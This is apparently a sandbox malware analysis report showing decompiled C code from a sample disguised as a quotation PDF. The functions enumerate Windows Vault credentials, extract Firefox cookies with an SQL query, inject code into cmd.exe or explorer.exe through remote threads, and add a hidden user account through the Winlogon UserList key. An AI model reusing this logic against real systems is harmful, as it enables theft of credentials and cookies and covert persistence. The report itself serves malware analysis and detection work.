Opcode ID: 84bb5ecf2e8e09564503e9b67f6d88be6258115284c6f67949de89485e7beb37
Instruction ID: d732456317fff74b34fb29a574da25995d0666704d97261e36a62587a8ddb249
Opcode Fuzzy Hash: 84bb5ecf2e8e09564503e9b67f6d88be6258115284c6f67949de89485e7beb37
Instruction Fuzzy Hash: 4F71E9B1D00209EBDF10DFE4DD49BEEBBB8AF08305F50402BF511E6291D778AA859B59

Uniqueness

Uniqueness Score: -1.00%

Function 00416B63 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 82
libraryCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00416B63(char __ecx) {
				char _v8;
				struct HINSTANCE__* _t40;
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;

				_push(__ecx);
				_v8 = __ecx;
				_t40 = LoadLibraryA("vaultcli.dll");
				_t2 =  &_v8; // 0x416762
				_t64 =  *_t2;
				 *( *_t2 + 0xdc) = _t40;
				_t4 =  &_v8; // 0x416762
				if( *((intOrPtr*)( *_t4 + 0xdc)) != 0) {
					_t6 =  &_v8; // 0x416762
					_t43 = E0041FF80(_t64, __eflags,  *((intOrPtr*)( *_t6 + 0xdc)), "VaultOpenVault", 0);
					_t8 =  &_v8; // 0x416762
					 *((intOrPtr*)( *_t8 + 0xa8)) = _t43;
					_t10 =  &_v8; // 0x416762
					_t45 = E0041FF80( *_t8, __eflags,  *((intOrPtr*)( *_t10 + 0xdc)), "VaultCloseVault", 0);
					_t12 =  &_v8; // 0x416762
					 *((intOrPtr*)( *_t12 + 0xac)) = _t45;
					_t14 =  &_v8; // 0x416762
					_t47 = E0041FF80( *_t12, __eflags,  *((intOrPtr*)( *_t14 + 0xdc)), "VaultEnumerateItems", 0);
					_t16 =  &_v8; // 0x416762
					 *((intOrPtr*)( *_t16 + 0xb0)) = _t47;
					_t18 =  &_v8; // 0x416762
					_t49 = E0041FF80( *_t16, __eflags,  *((intOrPtr*)( *_t18 + 0xdc)), "VaultGetItem", 0);
					_t20 =  &_v8; // 0x416762
					 *((intOrPtr*)( *_t20 + 0xb4)) = _t49;
					_t22 =  &_v8; // 0x416762
					_t51 = E0041FF80( *_t20, __eflags,  *((intOrPtr*)( *_t22 + 0xdc)), "VaultGetItem", 0);
					_t24 =  &_v8; // 0x416762
					 *((intOrPtr*)( *_t24 + 0xb8)) = _t51;
					_t26 =  &_v8; // 0x416762
					_t53 = E0041FF80( *_t24, __eflags,  *((intOrPtr*)( *_t26 + 0xdc)), "VaultFree", 0);
					_t28 =  &_v8; // 0x416762
					 *((intOrPtr*)( *_t28 + 0xbc)) = _t53;
					_t30 =  &_v8; // 0x416762
					_t54 =  *_t30;
					__eflags =  *((intOrPtr*)(_t54 + 0xa8));
					if( *((intOrPtr*)(_t54 + 0xa8)) == 0) {
						L7:
						return 0;
					}
					_t32 =  &_v8; // 0x416762
					_t56 =  *_t32;
					__eflags =  *((intOrPtr*)(_t56 + 0xb0));
					if( *((intOrPtr*)(_t56 + 0xb0)) == 0) {
						goto L7;
					}
					_t57 = _v8;
					__eflags =  *((intOrPtr*)(_t57 + 0xac));
					if( *((intOrPtr*)(_t57 + 0xac)) == 0) {
						goto L7;
					}
					_t58 = _v8;
					__eflags =  *((intOrPtr*)(_t58 + 0xb4));
					if( *((intOrPtr*)(_t58 + 0xb4)) == 0) {
						goto L7;
					}
					_t59 = _v8;
					__eflags =  *((intOrPtr*)(_t59 + 0xbc));
					if( *((intOrPtr*)(_t59 + 0xbc)) != 0) {
						__eflags = 1;
						return 1;
					}
					goto L7;
				}
				return 0;
			}

0x00416b66
0x00416b67
0x00416b6f
0x00416b75
0x00416b75
0x00416b78
0x00416b7e
0x00416b88
0x00416b98
0x00416ba1
0x00416ba9
0x00416bac
0x00416bb9
0x00416bc2
0x00416bca
0x00416bcd
0x00416bda
0x00416be3
0x00416beb
0x00416bee
0x00416bfb
0x00416c04
0x00416c0c
0x00416c0f
0x00416c1c
0x00416c25
0x00416c2d
0x00416c30
0x00416c3d
0x00416c46
0x00416c4e
0x00416c51
0x00416c57
0x00416c57
0x00416c5a
0x00416c61
0x00416c93
0x00000000
0x00416c93
0x00416c63
0x00416c63
0x00416c66
0x00416c6d
0x00000000
0x00000000
0x00416c6f
0x00416c72
0x00416c79
0x00000000
0x00000000
0x00416c7b
0x00416c7e
0x00416c85
0x00000000
0x00000000
0x00416c87
0x00416c8a
0x00416c91
0x00416c99
0x00000000
0x00416c99
0x00000000
0x00416c91
0x00000000

APIs

LoadLibraryA.KERNEL32(vaultcli.dll,?,?,00416762), ref: 00416B6F

Strings

VaultEnumerateItems, xrefs: 00416BD5
VaultGetItem, xrefs: 00416C17
VaultGetItem, xrefs: 00416BF6
vaultcli.dll, xrefs: 00416B6A
VaultFree, xrefs: 00416C38
VaultOpenVault, xrefs: 00416B93
bgA, xrefs: 00416C6F, 00416C87, 00416C7B
bgA, xrefs: 00416B75, 00416B7E, 00416B98, 00416BA9, 00416BB9, 00416BCA, 00416BDA, 00416BEB, 00416BFB, 00416C0C, 00416C1C, 00416C2D, 00416C3D, 00416C4E, 00416C57, 00416C63
VaultCloseVault, xrefs: 00416BB4

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultGetItem$VaultOpenVault$bgA$bgA$vaultcli.dll
API String ID: 1029625771-1825378180
Opcode ID: 83d743842a6eea0eb53620493774f894bc7154084bc5fa9da4f27e502398fb7c
Instruction ID: 24fb0ec021a04a6e5e5b8cb5a505302cbc61da1745b97c8d0953a073acaad9d7
Opcode Fuzzy Hash: 83d743842a6eea0eb53620493774f894bc7154084bc5fa9da4f27e502398fb7c
Instruction Fuzzy Hash: A531FB34A40204EFEB00CF94D949FE973B2EB04308F6500FAE408AF292D7756E45DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00422291 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 84
sleepprocessmemoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00422291() {
				void* _v8;
				signed int _v12;
				void* _v16;
				intOrPtr _v20;
				struct _PROCESS_INFORMATION _v36;
				struct _STARTUPINFOA _v104;
				void* _t22;
				int _t26;
				int _t34;
				void* _t36;
				signed int _t40;

				_v12 = _v12 & 0x00000000;
				_t22 = GetCurrentProcess();
				__imp__IsWow64Process(_t22,  &_v12);
				if(_t22 != 0) {
					if(_v12 != 0) {
						_v8 = VirtualAlloc(0, 0xff, 0x1000, 0x40);
						GetWindowsDirectoryA(_v8, 0x104);
						_t26 = lstrlenA(_v8);
						_t40 = 5;
						memcpy(_v8 + _t26, "\\System32\\cmd.exe", _t40 << 2);
						E0040132F( &_v104, 0, 0x44);
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t34 = CreateProcessA(_v8, 0, 0, 0, 0, 0x8000000, 0, 0,  &_v104,  &_v36);
						if(_t34 != 0) {
							Sleep(0x3e8);
							_v20 = _v36.dwProcessId;
							_t34 = E00422385( &E0042C770, _v20);
						}
						return _t34;
					}
					_t22 = E004224A3(_t36, __eflags, "explorer.exe");
					_v16 = _t22;
					__eflags = _v16;
					if(_v16 != 0) {
						return E00422385( &E0042C770, _v16);
					}
				}
				return _t22;
			}

0x00422299
0x004222a1
0x004222a8
0x004222b0
0x004222ba
0x004222d4
0x004222df
0x004222e8
0x004222f3
0x004222fb
0x00422305
0x00422312
0x00422313
0x00422314
0x00422315
0x00422332
0x0042233a
0x00422341
0x0042234a
0x00422355
0x0042235b
0x00000000
0x0042233a
0x00422363
0x00422369
0x0042236c
0x00422370
0x00000000
0x00422380
0x00422370
0x00422384

APIs

GetCurrentProcess.KERNEL32(00000000), ref: 004222A1
IsWow64Process.KERNEL32(00000000), ref: 004222A8
VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040), ref: 004222CE
GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004222DF
lstrlenA.KERNEL32(?), ref: 004222E8
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00422332
Sleep.KERNEL32(000003E8), ref: 00422341

Part of subcall function 00422385: OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 00422398
Part of subcall function 00422385: GetCurrentProcessId.KERNEL32 ref: 004223A1
Part of subcall function 00422385: GetModuleFileNameA.KERNEL32(00000000,?,000000FF), ref: 004223C5
Part of subcall function 00422385: VirtualAllocEx.KERNEL32(?,00000000,00000800,00003000,00000040), ref: 00422415
Part of subcall function 00422385: WriteProcessMemory.KERNEL32(?,0042237F,?,00000800,00000000), ref: 0042242E
Part of subcall function 00422385: VirtualProtectEx.KERNEL32(?,0042237F,00000800,00000040,?), ref: 00422445
Part of subcall function 00422385: VirtualAllocEx.KERNEL32(?,00000000,00000103,00003000,00000004), ref: 0042245C
Part of subcall function 00422385: WriteProcessMemory.KERNEL32(?,?,?,00000103,00000000), ref: 00422479
Part of subcall function 00422385: CreateRemoteThread.KERNEL32(?,00000000,00000000,00422271,?,00000000,00000000), ref: 00422496

Strings

\System32\cmd.exe, xrefs: 004222F4
explorer.exe, xrefs: 0042235E

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Process$Virtual$Alloc$CreateCurrentMemoryWrite$DirectoryFileModuleNameOpenProtectRemoteSleepThreadWindowsWow64lstrlen
String ID: \System32\cmd.exe$explorer.exe
API String ID: 3997530790-2924646674
Opcode ID: 76be4d5be2b6823915b2d807b896d6a1a7677a390a85cd409d463aa40f4add54
Instruction ID: 20588769f664fe6258cd866d0594e7c8d74fafb96aff9dbbe4cbfd08d44e14ca
Opcode Fuzzy Hash: 76be4d5be2b6823915b2d807b896d6a1a7677a390a85cd409d463aa40f4add54
Instruction Fuzzy Hash: ED21A332B40319BBEB20DBE4ED46F9D77B4AB48711F600026F700B90E0DBB85605DA5D

Uniqueness

Uniqueness Score: -1.00%

Function 004182AB Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 429
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004182AB(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				signed int _v44;
				char _v48;
				char _v52;
				char _v56;
				signed int _v60;
				char* _v64;
				char* _v68;
				char* _v72;
				char* _v76;
				signed int _v80;
				WCHAR* _v84;
				WCHAR* _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v100;
				char _v104;
				signed int _v108;
				WCHAR* _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				char _v128;
				intOrPtr _v132;
				char _v136;
				intOrPtr _v140;
				char _v144;
				intOrPtr _v148;
				char _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				signed int _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v228;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				short _v792;
				signed int _t254;
				intOrPtr _t258;
				signed int _t265;
				intOrPtr _t273;
				signed int _t337;
				signed int _t338;
				void* _t409;
				char* _t423;
				char* _t426;
				char* _t429;
				char* _t432;
				intOrPtr _t486;

				_t490 = __eflags;
				_t486 = __edx;
				_v8 = __ecx;
				_v24 = _v24 & 0x00000000;
				_v272 = _v272 & 0x00000000;
				E0041E9F8(__ecx, __eflags,  &_v20, 0x1a);
				E00406C53( &_v20, __eflags, L"\\Mozilla\\Firefox\\");
				E00406FBC( &_v32,  &_v20);
				E00406C53( &_v32, _t490, L"profiles.ini");
				E00406F64( &_v28, L"Profile");
				_v80 = _v80 & 0x00000000;
				E00406CDA( &_v28, _t490, _v80);
				E0040132F( &_v792, 0, 0x208);
				_v84 = E00406F44( &_v32);
				_v88 = E00406F44( &_v28);
				GetPrivateProfileStringW(_v88, L"Path", 0,  &_v792, 0x104, _v84);
				E00406FBC( &_v16,  &_v20);
				_v92 = E00406C53( &_v16, _t490,  &_v792);
				E00406C7E(_v92, _t490, "\\cookies.sqlite");
				if(E0041E9E4( &_v16) != 0) {
					_v100 =  *((intOrPtr*)(_v8 + 0x40));
					_v24 = _v100(E00406B4A(E00406E4B( &_v16, __eflags,  &_v104)),  &_v56);
					E00406B06();
					__eflags = _v24;
					if(_v24 == 0) {
						_v264 = _v264 & 0x00000000;
						_v268 = _v268 & 0x00000000;
						_v112 = "SELECT host, path, name, value, expiry, isHttpOnly, isSecure FROM moz_cookies";
						_v116 =  *((intOrPtr*)(_v8 + 0x44));
						_t254 = _v116(_v56, _v112, 0xffffffff,  &_v12, 0);
						__eflags = _t254;
						if(_t254 != 0) {
							L35:
							_v204 =  *((intOrPtr*)(_v8 + 0x7c));
							_v204(_v12);
							_t258 =  *0x42cebc; // 0x0
							_v208 = _t258;
							_v208(_v56);
							_v212 = 1;
							E00406BE2();
							E00406BE2();
							E00406BE2();
							E00406BE2();
							return _v212;
						}
						__eflags = _v24;
						if(_v24 != 0) {
							goto L35;
						}
						_t265 = E0040B8D1(0x61a5c);
						_pop(_t409);
						_v44 = _t265;
						__eflags = _v44;
						if(_v44 == 0) {
							_t74 =  &_v60;
							 *_t74 = _v60 & 0x00000000;
							__eflags =  *_t74;
						} else {
							 *_v44 = 0x270f;
							E00401477(_t409, _v44 + 4, 0x28, 0x270f, E00403D2F);
							_v60 = _v44 + 4;
						}
						 *0x42cca8 = _v60;
						 *0x42ccac =  *0x42ccac & 0x00000000;
						__eflags =  *0x42ccac;
						while(1) {
							_v120 =  *((intOrPtr*)(_v8 + 0x60));
							_v24 = _v120(_v12);
							__eflags = _v24 - 0x64;
							if(_v24 != 0x64) {
								break;
							}
							E0040691E( &_v52);
							E0040691E( &_v48);
							E0040691E( &_v40);
							E0040691E( &_v36);
							_v124 =  *((intOrPtr*)(_v8 + 0x4c));
							_v64 = _v124(_v12, 0);
							_t423 = _v64;
							__eflags =  *_t423;
							if( *_t423 != 0) {
								E00406830( &_v52, E00406B58( &_v128, _v64));
								E00406B06();
							}
							_v132 =  *((intOrPtr*)(_v8 + 0x4c));
							_v68 = _v132(_v12, 1);
							_t426 = _v68;
							__eflags =  *_t426;
							if( *_t426 != 0) {
								E00406830( &_v48, E00406B58( &_v136, _v68));
								E00406B06();
							}
							_v140 =  *((intOrPtr*)(_v8 + 0x4c));
							_v72 = _v140(_v12, 2);
							_t429 = _v72;
							__eflags =  *_t429;
							if( *_t429 != 0) {
								E00406830( &_v40, E00406B58( &_v144, _v72));
								E00406B06();
							}
							_v148 =  *((intOrPtr*)(_v8 + 0x4c));
							_v76 = _v148(_v12, 3);
							_t432 = _v76;
							__eflags =  *_t432;
							if( *_t432 != 0) {
								E00406830( &_v36, E00406B58( &_v152, _v76));
								E00406B06();
							}
							_v156 =  *((intOrPtr*)(_v8 + 0x54));
							_v220 = _v156(_v12, 4);
							_v216 = _t486;
							_v160 =  *((intOrPtr*)(_v8 + 0x50));
							_v184 = _v160(_v12, 5);
							_v164 =  *((intOrPtr*)(_v8 + 0x50));
							_v188 = _v164(_v12, 6);
							__eflags = E00406747( &_v40);
							if(__eflags > 0) {
								L21:
								E00403D2F( &_v260, __eflags);
								__eflags = E00406747( &_v52);
								if(__eflags > 0) {
									E00406BFC( &_v260, E00406770( &_v52, __eflags,  &_v168));
									E00406BE2();
								}
								__eflags = E00406747( &_v48);
								if(__eflags > 0) {
									E00406BFC( &_v256, E00406770( &_v48, __eflags,  &_v172));
									E00406BE2();
								}
								__eflags = E00406747( &_v40);
								if(__eflags > 0) {
									E00406BFC( &_v252, E00406770( &_v40, __eflags,  &_v176));
									E00406BE2();
								}
								__eflags = E00406747( &_v36);
								if(__eflags != 0) {
									E00406BFC( &_v248, E00406770( &_v36, __eflags,  &_v180));
									E00406BE2();
								}
								_v244 = _v220;
								_v240 = _v216;
								_v236 = _v184;
								_v228 = _v188;
								__eflags =  *0x42ccac - 0x270f;
								if(__eflags != 0) {
									E00403D64( *0x42ccac * 0x28 +  *0x42cca8,  &_v260);
									_t337 =  *0x42ccac; // 0x0
									_t338 = _t337 + 1;
									__eflags = _t338;
									 *0x42ccac = _t338;
								}
								E00401889( &_v260, __eflags);
								goto L32;
							} else {
								__eflags = E00406747( &_v36);
								if(__eflags <= 0) {
									L32:
									E00406B06();
									E00406B06();
									E00406B06();
									E00406B06();
									continue;
								}
								goto L21;
							}
						}
						__eflags = _v24;
						if(_v24 == 0) {
							goto L35;
						}
						_v192 =  *((intOrPtr*)(_v8 + 0x7c));
						_v192(_v12);
						_t273 =  *0x42cebc; // 0x0
						_v196 = _t273;
						_v196(_v56);
						_v200 = _v200 & 0x00000000;
						E00406BE2();
						E00406BE2();
						E00406BE2();
						E00406BE2();
						return _v200;
					}
					_v108 = _v108 & 0x00000000;
					E00406BE2();
					E00406BE2();
					E00406BE2();
					E00406BE2();
					return _v108;
				}
				_v96 = _v96 & 0x00000000;
				E00406BE2();
				E00406BE2();
				E00406BE2();
				E00406BE2();
				return _v96;
			}

0x004182ab
0x004182ab
0x004182b4
0x004182b7
0x004182bb
0x004182c8
0x004182d7
0x004182e3
0x004182f0
0x004182fd
0x00418302
0x0041830c
0x0041831f
0x0041832f
0x0041833a
0x00418356
0x00418363
0x00418377
0x00418382
0x00418393
0x004183c7
0x004183e7
0x004183ed
0x004183f2
0x004183f6
0x00418429
0x00418430
0x00418437
0x00418444
0x00418455
0x0041845b
0x0041845d
0x00418869
0x0041886f
0x00418878
0x0041887f
0x00418884
0x0041888d
0x00418894
0x004188a1
0x004188a9
0x004188b1
0x004188b9
0x00000000
0x004188be
0x00418463
0x00418467
0x00000000
0x00000000
0x00418472
0x00418477
0x00418478
0x0041847b
0x0041847f
0x004184ad
0x004184ad
0x004184ad
0x00418481
0x00418484
0x0041849d
0x004184a8
0x004184a8
0x004184b4
0x004184b9
0x004184b9
0x004184c0
0x004184c6
0x004184d0
0x004184d3
0x004184d7
0x00000000
0x00000000
0x004184e0
0x004184e8
0x004184f0
0x004184f8
0x00418503
0x00418510
0x00418519
0x00418520
0x00418522
0x00418533
0x0041853b
0x0041853b
0x00418546
0x00418553
0x0041855c
0x00418563
0x00418565
0x00418579
0x00418584
0x00418584
0x0041858f
0x004185a2
0x004185ab
0x004185b2
0x004185b4
0x004185c8
0x004185d3
0x004185d3
0x004185de
0x004185f1
0x004185fa
0x00418601
0x00418603
0x00418617
0x00418622
0x00418622
0x0041862d
0x00418640
0x00418646
0x00418652
0x00418665
0x00418671
0x00418684
0x00418692
0x00418694
0x004186a6
0x004186ac
0x004186b9
0x004186bb
0x004186d3
0x004186de
0x004186de
0x004186eb
0x004186ed
0x00418705
0x00418710
0x00418710
0x0041871d
0x0041871f
0x00418737
0x00418742
0x00418742
0x0041874f
0x00418751
0x00418769
0x00418774
0x00418774
0x00418785
0x0041878b
0x00418797
0x004187a3
0x004187a9
0x004187b3
0x004187c9
0x004187ce
0x004187d3
0x004187d3
0x004187d4
0x004187d4
0x004187df
0x00000000
0x00418696
0x0041869e
0x004186a0
0x004187e4
0x004187e7
0x004187ef
0x004187f7
0x004187ff
0x00000000
0x004187ff
0x00000000
0x004186a0
0x00418694
0x00418809
0x0041880d
0x00000000
0x00000000
0x00418815
0x0041881e
0x00418825
0x0041882a
0x00418833
0x0041883a
0x00418844
0x0041884c
0x00418854
0x0041885c
0x00000000
0x00418861
0x004183f8
0x004183ff
0x00418407
0x0041840f
0x00418417
0x00000000
0x0041841c
0x00418395
0x0041839c
0x004183a4
0x004183ac
0x004183b4
0x00000000

APIs

Part of subcall function 0041E9F8: SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000), ref: 0041EA25

Part of subcall function 00406FBC: lstrcpyW.KERNEL32 ref: 00406FF9

Part of subcall function 00406F64: lstrlenW.KERNEL32( B,00003000,00000000,?,004220E3,?), ref: 00406F73
Part of subcall function 00406F64: lstrlenW.KERNEL32(0000000A,004220E3,?), ref: 00406F8D
Part of subcall function 00406F64: lstrcpyW.KERNEL32 ref: 00406FAF

Part of subcall function 00406CDA: wsprintfW.USER32 ref: 00406CF5

GetPrivateProfileStringW.KERNEL32 ref: 00418356

Part of subcall function 0041E9E4: PathFileExistsW.SHLWAPI(00000000,?,00405C98,?,?,?,00000000,00000000), ref: 0041E9F0

Strings

\Mozilla\Firefox\, xrefs: 004182CF
Path, xrefs: 0041834E
\cookies.sqlite, xrefs: 0041837A
Profile, xrefs: 004182F5
sB, xrefs: 0041844F
profiles.ini, xrefs: 004182E8
SELECT host, path, name, value, expiry, isHttpOnly, isSecure FROM moz_cookies, xrefs: 00418437

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Pathlstrcpylstrlen$ExistsFileFolderPrivateProfileSpecialStringwsprintf
String ID: sB$Path$Profile$SELECT host, path, name, value, expiry, isHttpOnly, isSecure FROM moz_cookies$\Mozilla\Firefox\$\cookies.sqlite$profiles.ini
API String ID: 282273689-2727336607
Opcode ID: 1400cc898044a21117957c999cfe3924afbdb2f9910c46e31d7723fbe776c9aa
Instruction ID: 2aa71d329dd561794b463bd8dc6d6074ec2c32945bbc8721beceb7576d409241
Opcode Fuzzy Hash: 1400cc898044a21117957c999cfe3924afbdb2f9910c46e31d7723fbe776c9aa
Instruction Fuzzy Hash: C512F6719041189FDB14EFA1DC96BEDB7B4FF14304F2140AAE406B61A1EB34AE95CF18

Uniqueness

Uniqueness Score: -1.00%

Function 0041C94A Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 255
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041C94A(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				short* _v44;
				void* _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				int _v64;
				char _v80;
				char _v96;
				char _v112;
				char _v128;
				char _v152;
				void* _t89;
				void* _t96;
				void* _t107;
				signed int _t190;
				void* _t257;

				_t257 = __eflags;
				_v8 = __ecx;
				_t89 = E0041F314( &_v152);
				_t190 = 6;
				E0041F2F0(E0041F302(memcpy(_v8, _t89, _t190 << 2),  &_v152), _v8);
				 *((intOrPtr*)(_v8 + 0x64)) = _a4;
				 *((intOrPtr*)(_v8 + 0x58)) = _a12;
				 *((intOrPtr*)(_v8 + 0x54)) = _a8;
				_t96 = E0041BE72(_v8, _t257);
				_t258 = _t96;
				if(_t96 == 0) {
					L6:
					if(E0041DF16() < 6) {
						L8:
						E00409811(_a4, E004091BC( &_v96, 2, _v8 + 0x5c, _v8 + 0x60));
						E0041F2DE(E0040918C( &_v96, _t262), _v8);
						return 0;
					}
					_t107 = E0041DEA7();
					_t262 = _t107;
					if(_t107 == 0) {
						__eflags = E0041E932() - 1;
						if(__eflags == 0) {
							E00406BFC(_v8 + 0x5c, E00406D2E(__eflags,  &_v32, 8));
							E00406BE2();
							E00406BFC(_v8 + 0x60, E00406D2E(__eflags,  &_v36, 8));
							E00406BE2();
							RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList", 0, 0, 0, 0xf013f, 0,  &_v12,  &_v64);
							_v40 = _v40 & 0x00000000;
							_v44 = E00406F44(_v8 + 0x5c);
							_v48 = _v12;
							RegSetValueExW(_v48, _v44, 0, 4,  &_v40, 4);
							RegCloseKey(_v12);
							__eflags = E0041AB68(_v8, _v8 + 0x5c, _v8 + 0x60);
							if(__eflags != 0) {
								E00421349(_a8, __eflags, E00406F64( &_v52, L"rudp"), _v8 + 0x5c);
								E00406BE2();
								E00421349(_a8, __eflags, E00406F64( &_v56, L"rpdp"), _v8 + 0x60);
								E00406BE2();
								_v60 = _v8 + 0x18;
								E0041F2DE(E00403BFF(_v60, E0041C6F5, _v8), _v8);
								__eflags = 1;
								return 1;
							}
							E00409811(_a4, E004091BC( &_v128, 9, _v8 + 0x5c, _v8 + 0x60));
							E0041F2DE(E0040918C( &_v128, __eflags), _v8);
							return 0;
						}
						E00409811(_a4, E004091BC( &_v112, 1, _v8 + 0x5c, _v8 + 0x60));
						E0041F2DE(E0040918C( &_v112, __eflags), _v8);
						return 0;
					}
					goto L8;
				}
				E00406BFC(_v8 + 0x5c, E004213B7(_a8, _t258,  &_v16, E00406F64( &_v20, L"rudp")));
				E00406BE2();
				E00406BE2();
				E00406BFC(_v8 + 0x60, E004213B7(_a8, _t258,  &_v24, E00406F64( &_v28, L"rpdp")));
				E00406BE2();
				E00406BE2();
				if(E00406F1B(_v8 + 0x5c) != 0 || E00406F1B(_v8 + 0x60) != 0) {
					E00409811(_a4, E004091BC( &_v80, 8, _v8 + 0x5c, _v8 + 0x60));
					E0040918C( &_v80, __eflags);
					return 1;
				} else {
					E0041F2DE(_t186, _v8);
					goto L6;
				}
			}

0x0041c94a
0x0041c955
0x0041c95e
0x0041c965
0x0041c97b
0x0041c986
0x0041c98f
0x0041c998
0x0041c99e
0x0041c9a3
0x0041c9a5
0x0041ca70
0x0041ca78
0x0041ca83
0x0041ca9f
0x0041caaf
0x00000000
0x0041cab4
0x0041ca7a
0x0041ca7f
0x0041ca81
0x0041cac0
0x0041cac3
0x0041cb11
0x0041cb19
0x0041cb32
0x0041cb3a
0x0041cb5e
0x0041cb64
0x0041cb73
0x0041cb79
0x0041cb8c
0x0041cb95
0x0041cbb1
0x0041cbb3
0x0041cc02
0x0041cc0a
0x0041cc27
0x0041cc2f
0x0041cc3a
0x0041cc50
0x0041cc57
0x00000000
0x0041cc57
0x0041cbd1
0x0041cbe1
0x00000000
0x0041cbe6
0x0041cae1
0x0041caf1
0x00000000
0x0041caf6
0x00000000
0x0041ca81
0x0041c9cc
0x0041c9d4
0x0041c9dc
0x0041ca02
0x0041ca0a
0x0041ca12
0x0041ca24
0x0041ca53
0x0041ca5b
0x00000000
0x0041ca35
0x0041ca6b
0x00000000
0x0041ca6b

APIs

Part of subcall function 0041F314: InitializeCriticalSection.KERNEL32(?,?,?,004140D4,00560720,00560720,?,004013D7), ref: 0041F31E

Part of subcall function 0041F302: DeleteCriticalSection.KERNEL32(?,?,?,0041C978), ref: 0041F30C

Part of subcall function 0041F2F0: EnterCriticalSection.KERNEL32(0041C7AD,?,?,0041C7AD), ref: 0041F2FA

Part of subcall function 00406F64: lstrlenW.KERNEL32( B,00003000,00000000,?,004220E3,?), ref: 00406F73
Part of subcall function 00406F64: lstrlenW.KERNEL32(0000000A,004220E3,?), ref: 00406F8D
Part of subcall function 00406F64: lstrcpyW.KERNEL32 ref: 00406FAF

Part of subcall function 00406BFC: lstrcpyW.KERNEL32 ref: 00406C46

Part of subcall function 00406F1B: lstrlenW.KERNEL32(00000000,?,?,?,00406FDE,00003000,?,?,00422109,?), ref: 00406F30

RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList,00000000,00000000,00000000,000F013F,00000000,?,?,00000000,00000000), ref: 0041CB5E
RegSetValueExW.ADVAPI32(?,?,00000000,00000004,00000000,00000004), ref: 0041CB8C
RegCloseKey.ADVAPI32(?), ref: 0041CB95

Part of subcall function 0041AB68: NetUserAdd.NETAPI32(00000000,00000001,?,00000000,?), ref: 0041ABBB

Part of subcall function 0041F2DE: LeaveCriticalSection.KERNEL32(00000000,?,?,0041C93E,00000000), ref: 0041F2E8

Strings

rpdp, xrefs: 0041C9E1
rpdp, xrefs: 0041CC16
rudp, xrefs: 0041CBF1
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList, xrefs: 0041CB54
rudp, xrefs: 0041C9AB

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: CriticalSection$lstrlen$lstrcpy$CloseCreateDeleteEnterInitializeLeaveUserValue
